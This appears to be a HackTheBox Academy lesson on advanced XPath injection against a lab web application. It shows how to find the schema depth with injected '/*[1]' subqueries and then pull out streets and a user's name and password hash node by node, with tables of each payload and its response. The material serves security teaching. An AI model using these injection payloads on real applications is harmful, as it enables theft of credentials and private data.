Injection Attacks  

XPath - Advanced Data Exfiltration


Sometimes, it is impossible to extract the entire XML document at once. Consider a web application that only displays an XPath query's first five results. If we inject our previous payload such that the query returns the entire XML document, we can only exfiltrate the first 5 data points. Thus, we need to modify our payload to manually iterate through the entire XML document to exfiltrate all data.


Advanced Data Exfiltration

For this section, we are working on a slightly modified version of the web application from the previous section that limits the number of results returned so that we cannot exfiltrate the entire XML document at once. To iterate through the XML schema, we must first determine the schema depth. We can achieve this by ensuring the original XPath query returns no results and appending a new query that gives us information about the schema depth. We set the search term in the parameter q to anything that does not return data, for instance, SOMETHINGINVALID. We can then set the parameter f to fullstreetname | /*[1]. This results in the following XPath query:

/a/b/c/[contains(d/text(), 'SOMETHINGINVALID')]/fullstreetname | /*[1]

The subquery /*[1] starts at the document root /, moves one node down the node tree due to the wildcard *, and selects the first child due to the predicate [1]. Thus, this subquery selects the document root's first child, the document root element node. Since the document root element node has multiple child nodes, it is of the data type array in PHP, which we can confirm when analyzing the response. The web application expects a string but receives an array and is thus unable to print the results, resulting in an empty response:

image

We can now determine the schema depth by iteratively appending an additional /*[1] to the subquery until the behavior of the web application changes. The results look like this (the q parameter remains the same as above for all requests):

Value of the f GET parameter Response
fullstreetname | /*[1] Nothing
fullstreetname | /*[1]/*[1] Nothing
fullstreetname | /*[1]/*[1]/*[1] Nothing
fullstreetname | /*[1]/*[1]/*[1]/*[1] 01ST ST
fullstreetname | /*[1]/*[1]/*[1]/*[1]/*[1] No Results!

From the above results, we can deduce that the schema depth for the street data is 4:

image

This allows us to start exfiltrating data by increasing the position in the last predicate until no more data can be retrieved:

Value of the f GET parameter Response
fullstreetname | /*[1]/*[1]/*[1]/*[1] 01ST ST
fullstreetname | /*[1]/*[1]/*[1]/*[2] 01ST
fullstreetname | /*[1]/*[1]/*[1]/*[3] ST
fullstreetname | /*[1]/*[1]/*[1]/*[4] No Results!

We successfully exfiltrated information about the first street in the data set. The three values seem to be the long street name, the short street name, and a street type. We can thus fill in some of the placeholders of the XML schema from the previous section. However, remember that we still do not know the exact node names. We are just trying to create an overview of the structure of the XML document:

<a>
	<b>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</b>
</a>

We can now extract information about the second street in the data set by incrementing the second to last position predicate in our injected payload like so:

Value of the f GET parameter Response
fullstreetname | /*[1]/*[1]/*[2]/*[1] 02ND AVE
fullstreetname | /*[1]/*[1]/*[2]/*[2] 02ND
fullstreetname | /*[1]/*[1]/*[2]/*[3] AVE
fullstreetname | /*[1]/*[1]/*[2]/*[4] No Results!

We can do this until we have exfiltrated information about all streets. However, since we are not interested in streets, let us see if the XML document contains other data sets. Incrementing the first position predicate in the payload makes little sense, as this is the document root, and valid XML documents only contain a single document root. However, we can alter the second position predicate to find additional data sets within the XML document. Remember that we need to determine the schema depth again, as it might differ from the depth of the streets data set. To illustrate this, consider the following sample XML document:

<dataset>
	<streets>
		<street>
			<fullstreetname>01ST ST</fullstreetname>
			<streetname>01ST</streetname>
			<street_type>ST</street_type>
		</street>
	</streets>
	<users>
		<group name="users">
			<user>
				<username>test</username>
				<password>test</password>
			</user>
		</group>
		<group name="admins">
			<user>
				<username>admin</username>
				<password>admin</password>
			</user>
		</group>
	</users>
</dataset>

When querying the above XML document, the street nodes are at depth 3: /dataset/streets/street. However, the user nodes are at depth 4: /dataset/users/group/user. Thus, the depth is different, and we must determine it again to exfiltrate the users. We can determine the depth using the following parameter values. Since we are targeting the second data set in the XML document, we need to use /*[1]/*[2] as a starting point:

Value of the f GET parameter Response
fullstreetname | /*[1]/*[2] Nothing
fullstreetname | /*[1]/*[2]/*[1] Nothing
fullstreetname | /*[1]/*[2]/*[1]/*[1] Nothing
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1] htb-stdnt
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1]/*[1] No Results!

We can see that the schema depth is 5. Furthermore, we seem to have exfiltrated a username. Just like we did with the streets data before, we can exfiltrate all user data by incrementing the last position predicate:

Value of the f GET parameter Response
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[1] htb-stdnt
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[2] 295362c2618a05ba3899904a6a3f5bc0
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[3] HackTheBox Academy Student Account
fullstreetname | /*[1]/*[2]/*[1]/*[1]/*[4] No Results!

From the data we exfiltrated, we seem to have leaked a user object consisting of a username, password hash, and description. We can now iteratively increment the position indices from right to left, just like we did with the street data set to exfiltrate all users.

Note: To exfiltrate an entire XML document, it makes sense to implement a simple script that does the exfiltration for us.

/ 1 spawns left

Waiting to start...

Questions

Answer the question(s) below to complete this Section and earn cubes!

Click here to spawn the target system!

Target: Click here to spawn the target system!

+10 Streak pts

Previous

+10 Streak pts

Next